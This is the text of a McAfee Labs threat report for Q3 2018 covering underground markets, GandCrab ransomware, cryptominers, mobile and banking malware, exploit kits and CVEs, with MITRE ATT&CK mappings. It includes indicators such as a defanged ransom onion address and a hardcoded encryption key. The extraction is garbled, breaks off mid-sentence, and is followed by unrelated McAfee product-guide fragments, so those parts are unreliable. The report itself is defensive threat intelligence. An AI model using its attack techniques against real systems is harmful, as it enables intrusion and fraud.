McAfee Labs Threats Report December 2018
REPORTMcAfee LabsThreats ReportDecember 2018TOP STORIES OF THE QUARTERUnderground Forums Boost theEffectiveness of CybercriminalsCryptomining Boom Times ContinueExploit Kits Add Support forVulnerabilities, RansomwareTargeted Attacks Motivatedby Cyber Espionage1McAfee Labs Threats Report, December 2018
REPORTIntroductionWelcome to the McAfee Labs Threats Report, December 2018. In this edition, we highlight the notable investigativeresearch and trends in threats statistics and observations gathered by the McAfee Advanced Threat Research andMcAfee Labs teams in Q3 of 2018. We are very excited to present to you new insights and a new format in this report. We are dedicated to listening toour customers to determine what you find important and how we can add value. In recent months we have gatheredmore threat intelligence, correlating and analyzing data to provide more useful insights into what is happening in theevolving threat landscape. McAfee is collaborating closely with MITRE Corporation in extending the techniques ofits MITRE ATT&CK knowledge base, and we now include the model in our report. We have just started to refine ourprocess and reports. You can expect more from us, and we welcome your feedback.Dark web marketplaces focuson selling narcotics and otherillicit goods. These marketsoffer hacking tools, hackersfor hire, and data records.Although the aftermath of takedowns of underground markets were still apparent in Q3, many other undergroundmarkets have eagerly filled the gaps. With the services on offer, the effectiveness of cybercriminals is increasing.During this quarter we also noticed greater activity from the GandCrab ransomware family. Using an affiliate program,demonstrating agile development, and mixing with other cybercrime services such as exploit kits have resulted in abig wave of attacks from this family.The third quarter was also highlighted by major security conferences. Representatives of the McAfee Advanced ThreatResearch team shared insights from their research at several of these events. At DEF CON we demonstrated how anattacker could manipulate medical devices. During Black Hat USA, the team released research into code reuseby North Korean malware families that revealed previously undiscovered links.We also welcomed many customers and partners as we shared our latest research at the McAfee MPOWERconferences in Las Vegas, Sydney, Tokyo, and Rome. During this quarter, we have stayed busy analyzing threats,welcoming new researchers to the team, and especially publishing our findings. You can read our results onour blogs page and our team’s page.We hope you enjoy the new format and we look forward to your reactions.—Raj Samani, Chief Scientist and McAfee FellowTwitter: @Raj Samani—Christiaan Beek, Lead ScientistTwitter: @ChristiaanBeek2McAfee Labs Threats Report, December 2018FollowShare
REPORTTable of Contents4Underground ForumsBoost the Effectivenessof Cybercriminals171981011Checks if infectedsystem is in Japan14PowerShell usesDDE techniqueTrojan sendsIQY fileIQY filesRansomware FamiliesDecline in NumberCryptomining BoomTimes Continue20Mobile Threats Fueledby Fake Apps23Banking Trojans Turn toUncommon File TypesDownloads andexecutesUrsnif malwareIQY file queries specialURL for script file.Exploit Kits Add Support forVulnerabilities, RansomwareThis report was researchedand written by:Vulnerabilities Open Doorto Shellcode, PrivilegeEscalation Christiaan BeekTargeted Attacks Motivatedby Cyber Espionage Steve GrobmanThreats Statistics Alexandre Mundo Alguacil Carlos Castillo Taylor Dunton John Fokker Tim Hux Niamh Minihane Lee Munson Eric Peterson Marc Rivero Thomas Roccia Raj Samani Craig Schmugar ReseAnne Sims Dan Sommer Bing Sun3McAfee Labs Threats Report, December 2018
REPORTUnderground Forums Boost the Effectivenessof CybercriminalsDark web marketsThe ripple effect of the takedowns of the Hansa andAlphaBay dark web markets were still apparent in Q3.Competing marketplaces, such as Dream Market, WallStreet Market, and Olympus Market eagerly filled the gapleft by law enforcement actions last year.Wall Street and Dream Markets have become the largestmarketplaces. Olympus Market, which was well on its wayto being one of the top markets, suddenly disappeared inQ3. There is speculation that the disappearance was anexit scheme initiated by the market’s administrators tosteal money from their own vendors and customers.The McAfee Advanced Threat Research team hasnoticed a shift in dark web platforms. Several individualsellers have moved away from large markets and haveopened their own specific marketplaces. They hope to flyunder the radar of law enforcement and build a trustedrelationship with their customers without the fear of aquick exit by the market owners. This shift has sparkeda new line of business: Defiant website designers whooffer to build hidden marketplaces for aspiring vendors.Other vendors are moving away from the TOR network,choosing platforms such as Telegram to offer their goodsand services.KEY TOPICDark web marketplaces, generally accessible via TOR,focus on selling narcotics and other illicit goods. Thesemarkets also offer hacking tools, hackers for hire, anddata records. The accessibility of these marketplaces toa large public make them a force to be reckoned with.Stolen digital data, which drives much of the profits,will continue to be a key motivator. As long as there aremarkets, we must secure our data.Underground hacker forumsDifferent from dark web markets, underground hackerforums are less accessible to the public and focus oncybercrime-related topics. McAfee researched several ofthese meeting places in Q3 to determine the hot topics.Leaked user credentials: Credential abuse is one of themost popular topics on the underground scene, and thelarge data breaches we read about help maintain thispopularity. The use of valid accounts makes it child’s playfor cybercriminals to access and take over an individual’spersonal life. Cybercriminals often show an interestin email accounts because these are regularly usedto restore login credentials for other online services.Password reuse, not enabling two-factor authentication,and failing to change passwords on a regular basis arethe main factors that make these attacks so effective.FollowShare4McAfee Labs Threats Report, December 2018
REPORTCVE discussions: We have seen numerous mentionsof Common Vulnerabilities and Exposures. The mostrecently published CVEs were hot topics in discussions ofbrowser exploit kits—RIG, Grandsoft, and Fallout—andof ransomware, especially GandCrab. In the Englishspeaking, less technical underground forums weobserved several discussions of old CVE implementationsin familiar tools such as Trillium MultiSploit. These threadsshow that cybercriminals are eager to weaponize bothnew and old vulnerabilities. The popularity of these topicsin underground forums should warn organizations tomake vulnerability management a priority in their cyberresilience plans.Credit card–stealing malware targeting e-commercesites: Large-scale credit card theft has shifted from pointof-sale systems to (third-party) payment platforms onlarge e-commerce sites. Groups such as Magecart havebeen responsible for many headlines in recent months,successfully skimming thousands of credit card detailsdirectly from the victims’ websites. These breaches havefueled an underground demand for malicious tools suchas MagentoCore that are being used to steal credit carddata by injecting malicious JavaScript code into vulnerableMagento platforms.Credit card shops: In spite of a decrease of point-of-salefraud such as skimming, recent big credit card theftsmaintain a steady supply of “fresh” card details offered on“dump sites” such as JokerStash, Trump’s Dumps,and Blackpass.Credit card companies and e-commerce sites are makinggood strides on fraud detection, for example, by5McAfee Labs Threats Report, December 2018KEY TOPICFigure 1. Trump’s Dumps login page.implementing geographic IP location checks for onlinepurchases. Every action triggers a reaction, however; wehave noticed an increased demand for compromisedmachines that are in the same zip code as stolen creditcard information. Underground markets that sell remotedesktop protocol (RDP) access make good use of this.RDP shopsEarly in Q3 we published an extensive report on onlineplatforms that sell RDP access to hacked machines.Criminals offer logins to computer systems worldwide,ranging from home to medical to even governmentsystems. RDP shops remained popular throughoutthis quarter and continue to serve criminals looking tocommit credit card fraud, cryptomining, ransomware,and account fraud. RDP shops such as Blackpass provideone-stop access to all the tools used to commit fraud; inaddition to RDP access they sell social security numbers,bank details, and online accounts.FollowShare
REPORTKEY TOPICFigure 2. RDP-shop Blackpass offers online accounts and credit cards possibly connected to one of the Magecart breaches.Fraudsters continue to demand RDP-accessible systemswith several active online accounts. Criminals can usethis access to order goods online through their victims’accounts and have them shipped elsewhere. RDPcontinues to be an Achilles heel for many organizations,judging by the amount of targeted ransomware attacks,such as SamSam, BitPaymer, and GandCrab, thatleverage RDP as an entry method.Ransomware-as-a-serviceOn underground forums there is a strong interest forthe leading ransomware-as-a-service families suchas GandCrab. These developers are forming strategicpartnerships with other essential services, such ascrypter services and exploit kits, to better service theircustomers and increase infection rates. At the end ofthe Q3 we published research on how the latest versionof GandCrab partnered with the relatively new crypterservice NTCrypt. This partnership was formed afterNTCrypt won a crypter contest launched by the groupbehind GandCrab. A crypter service provides malwareobfuscation to evade antimalware security products.FollowShare6McAfee Labs Threats Report, December 2018
REPORTKEY TOPICFigure 3. The NTCrypt-GandCrab partnership announcing a special price for GandCrab users.Android malware: We saw an increase in discussions ofmobile malware, mostly targeting Android and focusedon botnets, banking fraud, ransomware, and bypassingtwo-factor authentication.Other malware and botnets: These two subjects formthe backbone of cybercrime; they are regular topics fordiscussion in the cybercriminal underground. In additionto threads on well-known malware families and largebotnets, we have seen numerous discussions of small,unnamed botnets, cryptocurrency mining malware, andremote access Trojans. Apart from GandCrab and itspartnered services, no other specific malware familiesstood out in underground discussions.Distributed denial of service: DDoS attack methodsand booter/stresser services remained hot topics amongyoung cybercriminals; we saw these mostly discussed inEnglish-speaking, less technical forums.FollowShare7McAfee Labs Threats Report, December 2018
REPORTKEY TOPICRansomware Families Decline in NumberAlthough we have seen a decline in the number of uniquefamilies during recent months, ransomware remainedactive in Q3. The decline in new families may be due tomany ransomware actors switching to a more lucrativebusiness model: cryptomining.One of the most active ransomware families in Q3was GandCrab. Due to its affiliate scheme, severalparticipants launched their campaigns when newversions were released. Many versions appeared as thedevelopers tried to stay ahead of the security industry’sresponses. The sheer volume of GandCrab samplescontributed to the increase in new ransomware in Q3.New ransomware families120100806040200Q3Q4Q1Q220182017Some of the changes we observed: Added to the Fallout exploit kit to boost infectionsUsed the CVE-2018-8440 vulnerability (a patch wasreleased in September) to boost infectionsAdded a random five-character extension toencrypt filesAdded the ability to kill processes related to Word,Excel, SQL Server, Oracle, PowerPoint, Outlook,and othersThe biggest change we noticed was the increase in sizeof the ransom payment. GandCrab Version 5 requiresthe victim to pay US 2,400 for the decryption key. Pastversions required 1,000.Q3Source: McAfee Labs, 2018.New ransomware 0Q42016Q1Q2Q32017Q4Q1Q22018Q3FollowSource: McAfee Labs, 2018.Share8McAfee Labs Threats Report, December 2018
REPORTKEY TOPICSimilarities in Version 5 with previous versions: Does not infect Russian usersContains a hardcoded list of URLs that it contacts tosend the victims’ system informationThe ransom/payment/decryption site is still on thedark web at hxxp://gandcrabmfe6mnef[.]onionUses the hardcoded key “jopochlen” to encrypt victims’information with the RC4 algorithmThe Advanced Threat Research team wrote an extensivereport on GandCrab Version 5 and its changes.Another active ransomware family in Q3 was Scarab,which released six new variants along with numerousupdates to current variants (new extension(s) addedto encrypted files, new ransomware notes, etc.).The ransomware does not appear to target a specificsector or region.New variants in Q3: ulyScarab-CyberGod—AugustUpdated in Q3: istencePrivilegeEscalationDefense EvasionCredential rtup ItemsProcess InjectionProcess InjectionHookingFile and DirectoryDiscoveryHookingScheduled TaskBypass User AccountControlInput CaptureRegistry Run Keys/Startup FolderBypass User AccountControlDisabling SecurityToolsScheduled TaskDLL Search OrderHijackingFile DeletionFigure 4. The Advanced Threat Research team mapped malware and other attacks in Q3 to the MITRE ATT&CK framework. We have removedtechniques that were not present. The darker the background, the more frequently the technique was used.FollowShare9McAfee Labs Threats Report, December 2018
REPORTKEY TOPICCryptomining Boom Times ContinueMining cryptocurrency via malware is one of the bigstories of 2018. Total “coin miner” malware has grownmore than 4,000% in the past year.New coin miner malware4,500,000Cryptominers will take advantage of any reliable scenario.Some security researchers discovered that unofficialrepositories of the open-source media player Kodi haveserved a modified add-on that delivers cryptominermalware. This operation started in 1,500,0001,000,000500,0000to fix crypto problems. The fake software executes witha single line in Bash. The users essentially infected theirown devices instead of falling victim to an unknownexploit or an exploit kit. In execution, OSX.Dummy opensa reverse shell on a malicious server, giving an attackeraccess to the compromised system.Q42016Q1Q2Q32017Q4Q1Q22018Q3Source: McAfee Labs, 2018.Security researcher Remco Verhoef discovered a Mac OSthreat later named OSX.Dummy, which was distributedon cryptomining chat groups. The exploitation is simple,requiring victims to execute a one-line command in theOSX terminal to download and execute the payload.The actor wrote messages on the Slack, Telegram, andDiscord channels suggesting users download softwareAnother campaign takes advantage of the vulnerabilityCVE-2018-14847, exploiting unpatched MikroTik routers.Security researcher Troy Mursch detected more than3,700 compromised devices serving as miners. Thecampaign primarily targeted North America and Brazil.We would not usually think of using routers or IoT devicessuch as IP cameras or videorecorders as cryptominersbecause their CPUs are not as powerful as those indesktop and laptop computers. However, due to thelack of proper security controls, cybercriminals canbenefit from volume over CPU speed. If they can controlthousands of devices that mine for a long time, they canstill make money.ExecutionPersistencePrivilege EscalationDefense EvasionDiscoveryCommand and ControlExecution throughModule LoadRegistry Run Keys/Startup FolderBypass User AccountControlBypass User AccountControlQuery RegistryData ObfuscationLocal Job SchedulingHookingHookingScheduled TaskProcess InjectionThird-Party SoftwareScheduled TaskStartup ItemsFigure 5. MITRE ATT&CK framework. The darker the background, the more frequently the technique was used.10McAfee Labs Threats Report, December 2018Coin miner malware hijackssystems to create (“mine”)cryptocurrency withoutvictims consent or awareness.New coin miner threats havejumped massively in 2018.Uncommonly Used PortFollowShare
REPORTKEY TOPICMobile Threats Fueled by Fake AppsOverall, new mobile malware declined by 24% in Q3, andMcAfee mobile security customers reported 36% fewerinfections in the quarter. In spite of the downward trend,the mobile security landscape detected some unusualthreats in Q3. New threats ranged from a fake “cheats”app for the Fortnite game that installed malware, tomobile banking Trojans and apps that served unwantedadvertisements. We observed an attack targetingmembers of the Israel Defense Forces that installedfake dating apps to infect their devices. The fake appexfiltrated data including location, contact list, listeningto phone calls, and using the camera.Global mobile malware infection rates(Percentage of mobile customers reporting Q22018Q3Source: McAfee Labs, 2018.New mobile malwareRegional mobile malware infection rates(Percentage of mobile customers reporting 32017Q4Q1Q22018Q3Source: McAfee Labs, 2018.11McAfee Labs Threats Report, December 2018AfricaQ4 2017AsiaAustraliaQ1 2018EuropeNorthAmericaQ2 2018SouthAmericaQ3 2018Source: McAfee Labs, 2018.FollowShare
REPORTKEY TOPICIn Q3 the McAfee Mobile Research team detected athreat that infected at least 5,000 devices. Android/TimpDoor spreads via phishing, using text messages totrick victims into downloading and installing a fake voicemessage app that allows cybercriminals to use infecteddevices as network proxies without users’ knowledge.If the fake application is installed, a background servicestarts a Socks proxy that redirects all network trafficfrom a third-party server via an encrypted connectionthrough a secure shell tunnel—allowing potential accessto internal networks and bypassing network securitymechanisms such as firewalls and network monitors.Devices running TimpDoor could serve as mobilebackdoors for stealthy access to corporate and homenetworks because the malicious traffic and payload areencrypted. Worse, a network of compromised devicescould also be used for more profitable purposes such assending spam and phishing emails, performing ad clickfraud, or launching distributed denial-of-service attacks.\Figure 6. The fake voice-message app Android/TimpDoor.The malicious app appears to be a legitimate voiceapplication, but the buttons and functions are fake.Figure 7. One of the most interesting characteristics of Android/Timpdoor is the capability to keep the SSH connection open.FollowShare12McAfee Labs Threats Report, December 2018
REPORTKEY TOPICThe app has an alarm to keep the connection established and constantly upload information regarding the device.Cisco’s Talos group uncovered a campaign that infected 13 iPhones with a malicious mobile device manager.The infection method is still unknown; the attackers would have required physical access or social engineeringtechniques to deploy the device managers. The infection workflow and capabilities:FollowShareFigure 8. Source: Cisco Talos Intelligence Group.13McAfee Labs Threats Report, December 2018
REPORTKEY TOPICThe attackers used BOptions sideloading techniques to inject a dynamic library and add features to installedlegitimate applications. This attack reminds us that development and framework environments are also vulnerableif they are not properly secured.Initial AccessPersistenceSpearphishing AttachmentDylib HijackingSpearphishing LinkDefense EvasionDiscoveryCollectionExfiltrationCommand and ControlAccess Token ManipulationAccount DiscoveryAudio CaptureAutomated ExfiltrationCommonly Used PortCode SigningApplication WindowDiscoveryAutomated CollectionData CompressedRemote File CopyBrowser BookmarkDiscoveryClipboard DataData EncryptedStandard Application LayerProtocolFile and DirectoryDiscoveryData from InformationRepositoriesData Transfer Size LimitsSystem Owner/UserDiscoveryData from Local SystemExfiltration OverAlternative ProtocolSystem Service DiscoveryEmail CollectionExfiltration OverCommand and ControlChannelSystem Time DiscoveryInput CaptureExfiltration Over OtherNetwork MediumScreen CaptureExfiltration Over PhysicalMediumSpearphishing via ServiceScheduled TransferFigure 9. MITRE ATT&CK framework. The darker the background, the more frequently the technique was used.Banking Trojans Turn to Uncommon File TypesBanking malware remained a constant threat during the year due to the effectiveness of campaigns and the profitsthat cybercriminals can enjoy. In Q3 we observed an increase in uncommon file types used in spam campaigns.Those attacks relied on bypassing email protection systems, which are configured to stop and analyze commonOffice, archive, scripting, and other files. This quarter, we observed IQY files (an Excel format) sent in separate wavesthat delivered different malware families to infected devices. These campaigns prompted users to click on emailswhile using conventional social engineering phrases: “photos sent,” “payment,” “please confirm.” These campaignsaccounted for around 500,000 emails sent worldwide.14McAfee Labs Threats Report, December 2018FollowShare
REPORTKEY TOPICSpam CampaignChecks if infectedsystem is in JapanPowerShell usesDDE techniqueTrojan sendsIQY fileIQY filesDownloads andexecutesUrsnif malwareIQY file queries specialURL for script file.Figure 10. The infection chain employs a combination of IQY files plus DDE, and PowerShell to deliver Ursnif or Bleboh malware.In Q3 we observed many campaigns using convincing emails, focused on their selected sectors and enticing users toclick on them.Financial institutions have added protections in recent years to protect their customers. One effective method is twofactor authentication for operations such as transferring funds to other accounts or logging into bank accounts. InQ3, the Advanced Threat Research team observed a well-known banking malware family had updated its “web injects”to include two-factor operations to attack certain financial companies.15McAfee Labs Threats Report, December 2018FollowShare
REPORTKEY TOPICFigure 11. A web inject file for the Zeus Panda malware. Source: Cofense.Zeus Panda often changes its web injects to include new techniques to bypass the latest protections applied by thefinancial sector.In Q3, some well-known malware families updated their versions with slight modifications. The banking TrojanKronos became popular in 2014, when it was discovered. This year, a new version hosted its control server on theTOR network and renamed the banking malware Osiris to sell on the underground market. Another new campaigntargeted users in Germany with malicious .doc files carrying macros that downloaded Kronos. Kronos was alsodelivered in Q3 by the RIG exploit kit, which previously dropped Zeus Panda.Banking malware has long been popular in Brazil. In Q3, McAfee detected a new family targeting the country:CamuBot attempts to camouflage itself as a security module required by the banks it targets. Compared with otherBrazilian malware families, CamuBot shares few similarities. CamuBot has taken on characteristics from non-Brazilianmalware families such as TrickBot, Ursnif, Dridex, and Qakbot. This is a major change in malware targeting Brazilians;most threats are less sophisticated compared with the banking malware affecting other continents. Organized cybergangs in Brazil are very active in targeting their own population. They have learned a lot from their Eastern Europepeers and have adapted their malware to include techniques used elsewhere.FollowShare16McAfee Labs Threats Report, December 2018
REPORTKEY TOPICExecutionPersistenceDefense EvasionCredential Access and andControlExploitation forClient ExecutionBootkitCode SigningHookingApplication WindowDiscoveryDistributedComponent ObjectModelClipboard DataData CompressedData EncodingPowerShellKernel Modules andExtensionsDCShadowInput CaptureFile and DirectoryDiscoveryPass the HashEmail CollectionExfiltration OverAlternative ProtocolUncommonly UsedPortWindowsManagementInstrumentationLocal Job SchedulingFile DeletionNetwork ServiceScanningRemote DesktopProtocolOffice ApplicationStartupModify RegistryPeripheral DeviceDiscoveryRegistry Run Keys/Startup FolderProcess InjectionProcess DiscoveryService RegistryPermissionsWeaknessScriptingQuery RegistrySoftware PackingSecurity SoftwareDiscoverySystem InformationDiscoverySystem TimeDiscoveryFigure 12. MITRE ATT&CK framework. The darker the background, the more frequently the technique was used.Exploit Kits Add Support for Vulnerabilities, RansomwareExploit kits are the delivery vehicles for many cybercrime operations. Some can remain in business, while others aretaken out by law enforcement actions. In Q3 we found two new exploit kits on the scene.Fallout: This exploit kit was discovered in August. It takes advantage of flaws in Adobe Flash Player and MicrosoftWindows. A successful infection will allow an attacker to download malware onto the victim’s computer. Thisexploit kit shares similarities with the Nuclear exploit kit. Fallout was found during an investigation at someJapanese organizations, although it targets no specific region. CVE-2018-4878 and CVE-2018-8174 are the only twovulnerabilities included in this kit, which used the latter flaw to spread GandCrab Version 5.The following chart is based on telemetry from McAfee Global Threat Intelligence. It shows the distribution of foursamples of the GandCrab Version 5 ransomware we measured in late September and early October. These sampleswere most likely spread via the Fallout exploit kit. The chart displays a typical exploit kit infection rate, with a high levelFollow 17McAfee Labs Threats Report, December 2018Share
REPORTKEY TOPICof hits at the beginning and a rapid decrease over a short time. This is a common business model for exploit kits; acustomer pays either by installations or for a fixed time. The September 28 increase was probably due to the releaseof another round of samples by affiliates.McAfee GTI reports of GandCrab ransomware version 5 over 10 b129ce07fadb006486953439ce0092651fd7a624-Sep 25-Sep 26-Sep 27-Sep 28-Sep 29-Sep 30-Sep 01-Oct 02-Oct 03-OctUnderminer: This exploit kit was discovered in July. It protects its own code and control server traffic with RSAencryption and takes advantage of flaws in Microsoft Internet Explorer and Flash Player to infect users with arange of malware, including cryptominers and boot kits. The exploit kit targets users in the Asia-Pacific region.Two vulnerabilities were added to this kit in Q3: CVE-2018-4878 (Adobe Flash Player 28.0.0.137 Use-after-freeRemote Code Execution) and CVE-2018-8174 (Windows VBScript Engine Remote Code Execution Vulnerability;for more, see the next section).Initial AccessExecutionPrivilege EscalationDefense EvasionDrive-By CompromiseExploitation for Client ExecutionExploitation for PrivilegeEscalationBypass User Account ControlExploit Public-Facing ApplicationScriptingExploitation for Defense EvasionFigure 13. MITRE ATT&CK framework. The darker the background, the more frequently the technique was used.18McAfee Labs Threats Report, December 2018FollowShare
REPORTKEY TOPICVulnerabilities Open Door to Shellcode, Privilege EscalationIn Q3 three vulnerabilities stood out for their use of new malware families or campaigns.Windows VBScript Engine Remote Code Execution Vulnerability (CVE-2018-8174). This flaw was patched in Maybut was exploited in Q3 by “Operation Personality Disorder.” The attackers used malicious RTF documents containingVBScript to exploit a flaw in Internet Explorer and launch shellcode. The code dropped a backdoor payload and gavecontrol of the infected systems. The campaign was carried out by the Cobalt Gang, whose alleged leader was arrestedin Spain this year.This vulnerability was added in Q3 to two new exploit kits, Fallout and Underminer. The flaw was also used to infectusers with GandCrab Version 5 via Fallout. The threat actors behind the malvertising campaign used legitimateadvertising sites to redirect victims to a landing page containing the exploit kit. The landing page contained Base64encoded VBScript code that is decoded by a JavaScript function. The decoded code executes shellcode by exploitingthe defect in the VBScript engine. The shellcode then downloads the payload, which loads GandCrab into memory onthe infected system.Windows ALPC Elevation of Privilege Vulnerability (CVE-2018-8440). This was patched in September. The zero-dayflaw made headlines after the security researcher who found the defect posted proof-of-concept details to Twitter andGitHub in late August—causing Microsoft to include a patch in the September updates. The flaw allowed anyone withlocal access rights to gain system privileges. The vulnerability was used to infect users with GandCrab by exploiting aprivilege escalation flaw in Windows, allowing the ransomware to gain elevated privileges
conferences in Las Vegas, Sydney, Tokyo, and Rome. During this quarter, we have stayed busy analyzing threats, welcoming new researchers to the team, and especially publishing our findings. You can read our results on our blogs page and our team's page. We hope you enjoy the new format and we look forward to your reactions.
McAfee Management of Native Encryption (MNE) 4.1.1 McAfee Policy Auditor 6.2.2 McAfee Risk Advisor 2.7.2 McAfee Rogue System Detection (RSD) 5.0.4 and 5.0.5 McAfee SiteAdvisor Enterprise 3.5.5 McAfee Virtual Technician 8.1.0 McAfee VirusScan Enterprise 8.8 Patch 8 and Patch 9 McA
4 From McAfee.com, copy the McAfee ePO software to the virtual McAfee ePO server. 5 From the McAfee ePO server, run the setup utility. 6 Using a remote browser, log on to McAfee
McAfee Firewall Enterprise Control Center Release Notes, version 5.3.1 McAfee Firewall Enterprise Control Center Product Guide, version 5.3.1 McAfee Firewall Enterprise McAfee Firewall Enterprise on CloudShield Installation Guide, version 8.3.0 McAfee Network Integrity Agent Product Guide, version 1.0.0.0
REPORT 2 McAfee Labs Threats Report, August 2019 Follow Share Ransomware attacks grew by 118%, new ransomware families were detected, and threat actors used innovative techniques. Introduction Welcome to the
McAfee ePolicy Orchestrator web API Scripting Guide McAfee ePolicy Orchestrator Log File Reference Guide These guides are available from the McAfee Support Website. Preface About this guide 8 McAfee ePolicy
the McAfee Firewall Admin Console client software, the hardware or virtual platform for running the firewall software. Configuration B. comprises: the McAfee Firewall Enterprise software, including its SecureOS operating system, the McAfee Firewal
McAfee, Inc. McAfee Firewall Enterprise 4150E Hardware Part Number: NSA-4150-FWEX-E Firmware Versions: 7.0.1.03 and 8.2.0 FIPS 140-2 Non-Proprietary Security Policy FIPS Security Level: 2 Document Version: 0.6 Prepared for: Prepared by: McAfee, Inc. Corsec Security, Inc. 282
2.2 McAfee Application Control Configuring McAfee Application Control 10 Commissioning Manual, 07/2011, A5E03658595-01 2.2 McAfee Application Control McAfee Application Control can be used to block execution of unauthorized applications on servers and workstations. This means that once it
